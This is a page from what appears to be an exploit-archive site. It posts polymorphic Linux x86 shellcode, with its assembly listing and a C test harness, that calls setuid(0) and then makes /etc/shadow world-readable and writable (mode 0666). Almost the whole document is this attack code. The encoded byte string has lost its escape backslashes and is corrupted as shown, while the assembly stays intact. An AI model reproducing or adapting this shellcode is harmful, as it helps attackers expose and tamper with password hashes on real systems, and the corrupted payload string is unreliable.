linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Byte

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Byte
# Published : 2010-05-31
# Author : antrhacks
# Previous Title : Linux x86 - ip6tables -F - 47 bytes
# Next Title : change mode 0777 of "/etc/shadow" with sys_chmod syscall

=============================================================================================
 linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes  
=============================================================================================

/* 
 * Title: linux/x86 Shellcode Polymorphic - setuid(0) + chmod("/etc/shadow", 0666) Shellcode 61 Bytes  
 * Encode  : _ADD
 * Author: antrhacks
 * Platform: Linux X86
*/

/* 0riginAl ASSembly
 31 db                	xor    %ebx,%ebx
 b0 17                	mov    $0x17,%al
 cd 80                	int    $0x80
 31 c0                	xor    %eax,%eax
 50                   	push   %eax
 68 61 64 6f 77       	push   $0x776f6461
 68 63 2f 73 68       	push   $0x68732f63
 68 2f 2f 65 74       	push   $0x74652f2f
 89 e3                	mov    %esp,%ebx
 66 b9 b6 01          	mov    $0x1b6,%cx
 b0 0f                	mov    $0xf,%al
 cd 80                	int    $0x80
 40                   	inc    %eax
 cd 80                	int    $0x80
*/


#include "stdio.h"

char shellcode[] = "xebx11x5ex31xc9xb1x37x80x6cx0exffx13"
"x80xe9x01x75xf6xebx05xe8xeaxffxffxff"
"x44xeexc3x2axe0x93x44xd3x63x7bx74x77x82x8ax7bx76x42x86x7bx7bx42x42x78x87x9c"
"xf6x79xccxc9x14xc3x22xe0x93x53xe0x93"; 

int main()
{
        printf(" [*] Polymorphic Shellcode - length: %dn",strlen(shellcode));
        (*(void(*)()) shellcode)();

        return 0;
}